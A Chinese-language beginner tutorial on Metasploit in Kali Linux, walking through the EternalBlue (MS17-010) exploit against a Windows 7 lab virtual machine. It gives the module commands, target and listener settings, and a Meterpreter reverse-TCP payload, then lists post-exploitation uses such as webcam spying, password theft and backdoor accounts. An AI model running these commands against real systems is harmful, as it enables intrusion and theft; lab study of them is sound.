在Kali操作系统上使用metasploit
目录
<一>:metasploit 简述
<二>:msf 使用法则
<三>:启动 metasploit 前需要做的事项
<四>:metasploit 攻击 windows 系统
metasploit 攻击 eternalblue(永恒之蓝)全流程:
(1):使用模块
(2):配置模块必选项
(3):运行模块
(4):设置必选项(补充)
<五>:meterpreter 攻击成功后能做什么
<一>:metasploit 简述
metasploit 简称 msf,是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的 shellcode,并持续保持更新。
<二>:msf 使用法则
使用模块 ->配置模块必选项->运行模块
<三>:启动 metasploit 前需要做的事项
①:打开Kali终端
②:使用sudo su 命令,并输入 Kali 的密码,切换至root用户
③:使用 msfdb init 命令初始化 metasploit 数据库(*可选)
<四>:metasploit 攻击 windows 系统
msfconsole:启动 metasploit 命令行 (命令行效率高,方便使用)
metasploit 攻击 eternalblue(永恒之蓝)全流程:
(1):使用模块
①:搜索微软给永恒之蓝的漏洞号:search ms17_010
②: 使用此漏洞:use exploit/windows/smb/ms17_010_eternalblue
(2):配置模块必选项
查看必选项[*required 为 yes 的就是必选项]
①:show options (查看设置)
(3):运行模块
以虚拟机上的xin7操作系统为靶机为例 (先同时按win+R,然后输入cmd,回车,最后输入ipconfig,查看被攻击的靶机IP地址)
①:set RHosts 被攻击的IP地址
②:show options (查看是否还有必选项需要修改)
③:set LPORT 0~65536 (为了防止攻击失败多设置一个)
④:run (攻击操作系统,并获取命令运行最低权限)
(注:显示攻击失败表示目标主机上没有此漏洞,此漏洞只适用于攻击自己的win7靶机,高版本的系统已经修复此漏洞,显示WIN 表示攻击成功,其他则是失败)
(4):设置必选项(补充)
①: set RHosts 被攻击的IP地址
[*RHOSTS 为 target host(s)代表要攻击谁]
②: set Payload windows/x64/meterpreter/reverse_tcp
[*Payload 是攻击载荷,就是攻击完成后想获取的东西,这里是想获取 meterpreter]
[*meterpreter 是metasploit 后渗透的神器 ]
③:set LHOST 攻击的IP地址
[*LHOST 为 listen host 代表你是谁]
④:set LPORT 攻击方使用的监听端口
[* LPORT 为 listen port 代表要在攻击方上开启的端口,1~65535随便选,但不能被占用]
(5):meterpreter 后输入 help,可显示攻击成功后可用的权限
<五>:meterpreter 攻击成功后能做什么
meterpreter 是强大的后渗透模块,可以输入help 查看帮助信息,远程控制、命令执行、摄像头监控、密码获取、创建后门用户、破坏篡改系统.......这些看起来非常复杂又高级的操作都能用meterpreter 中的一行或几个字母,简单的命令完成。
(注:此文章及操作流程只限于学习交流,请勿进行非法操作,做遵纪守法公民)
在Kali操作系统上使用metasploit相关推荐
- msf win10漏洞_在Kali Linux上使用Metasploit攻击Win10机器的技巧
Metasploit框架是全球黑客最常用的框架.它允许黑客设置创建有利环境(称为Meterpreter)的侦听器来操纵受感染的计算机.在本文中,我们将了解Kali Linux中的这个框架如何用于攻击w ...
- metasploit下载教程linux,在Debian 10/9系统上安装Metasploit Framework的方法
本文介绍在Debian 10/9操作系统上安装Metasploit Framework的方法,以脚本的方式安装,全程相当的简单,按照以下步骤操作即可. 在Debian 10/Debian 9上安装Me ...
- mac使用被动ftp模式(pasv)_网络安全工程师与白帽子黑客教你:Kali Linux之使用Metasploit进行FTP服务扫描实战...
本分享仅做学习交流,请自觉遵守法律法规! 搜索:Kali与编程,学习更多网络攻防干货! 下篇文章将在明天下午五点发布,敬请关注! 一.背景介绍 FTP是用来在两台计算机之间传输文件,是Inter ...
- 网络攻防——kali操作系统基本使用
1.阅读前的声明 本文章中生成的木马带有一定的攻击性,使用时请遵守网络安全相关的法律法规(恶意攻击操作系统属于违法行为). 2.环境安装 生成木马主要需要如下工具:kali操作系统,V ...
- 笔记本或者台式机安装kali操作系统
1.下载kali操作系统:(我用的是阿里云镜像下载) https://mirrors.aliyun.com/kali-images/current/kali-linux-2022.3-installe ...
- kali操作系统+信息搜集工具
1.完善自己虚拟机的kali linux系统,将系统升级到最新版本 2.配置kali操作系统 修改更新源 /etc/apt/sources.list apt-get update 更新软件列表 ap ...
- kail linux纯文本浏览器,在Linux Mint/Kali Linux上安装Vivaldi Web浏览器的方法
本文介绍在Linux Mint/Kali Linux操作系统上安装Vivaldi Web浏览器的方法,只需要下面两个步骤即可,即先添加APT存储库然后运行命令安装. 一.添加APT存储库 Vivald ...
- 从Qcheck 1.3 不能在不同操作系统上运行问题(chro124、chro342)说开来------
[本文重在技巧学习,授人以鱼,不如授人以渔!!!] 因为公司项目需要对带宽占用进行测试, 最近看电子工业出版社<网络管理工具使用详解>就qcheck 1.3 不能在不同的操作系统之间运行 ...
- Linux操作系统上lsof命令详解
Linux操作系统上lsof命令详解 2011-10-08 18:31:31 http://xjsunjie.blog.51cto.com/999372/682865 标签:Linux lsof命令 ...
最新文章
- nginx安装配置http、tcp代理
- java归并排序代码_Java归并排序算法
- 错误摘要 HTTP 错误 403.14 - Forbidden Web 服务器被配置为不列出此目录的内容。
- java对集合的操作_Java中对List集合的常用操作
- java对象的状态由什么表示_持久化层的Java对象可处于哪些状态?这些状态有哪些特征?...
- .net Cache 需要注意的地方
- 风变编程python第一关_风变编程python学习心得
- C++ STL详解超全总结(快速入门STL)
- Flink重启策略Restart-Strategy
- 环球黑卡可以透支吗?环球黑卡是信用卡吗
- 记录一个pycharm的神奇bug
- matplotlib 柱状图画误差棒
- RTSP视频边缘计算网关EasyNVR在5G时代有什么运用价值?
- LED数码管段码生成
- UI5:创建.yaml文件报错:无法加载文件 C:\Users\86178\AppData\Roaming\npm\ui5.ps1
- 经济放缓 全球角色逆转
- 获取打印机分辨率_为孩子准备的第一台口袋打印机,喵喵机P2S评测
- pycharm 破解方法
- 【IntelliJ IDEA 2019.2】java读取发送pc串口数据
- 手机拍照要注意光线问题
热门文章
- kbhit linux windows通用,_kbhit() for Linux
- Context Menus
- [转]【C/C++】STL详解
- 用Java实现简单的井字棋程序(α-β剪枝)
- 服务器和网站APP为什么会被反复入侵
- vue的entries和nextTick
- 用“等待-通知”机制优化循环等待
- mysql查询学生表年龄语句_mysql中一张(居民)表按年龄段查询数据
- 如何安装redis和给wordpres加速?
- 相册服务器维护,相册云服务器